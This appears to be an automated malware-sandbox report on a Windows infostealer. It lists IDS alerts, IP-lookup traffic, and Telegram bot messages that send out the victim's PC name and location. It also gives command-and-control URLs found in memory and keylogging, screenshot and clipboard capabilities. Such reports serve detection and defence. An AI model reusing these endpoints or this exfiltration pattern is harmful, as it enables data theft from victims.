                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49772 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49754 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49810 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49718 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49766 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49760 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00B1CE44
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2020:59:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2021:09:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:44:17 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:44:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20a
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000007.00000002.4503982433.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000031AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.000000000303E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.000000000303E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000007.00000002.4503982433.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002988000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegSvcs.exe, 00000007.00000002.4503982433.00000000031E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000031DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49844 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B1EAFF
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B1ED6A
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FDED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00FDED6A
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B1EAFF
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00B0AA57
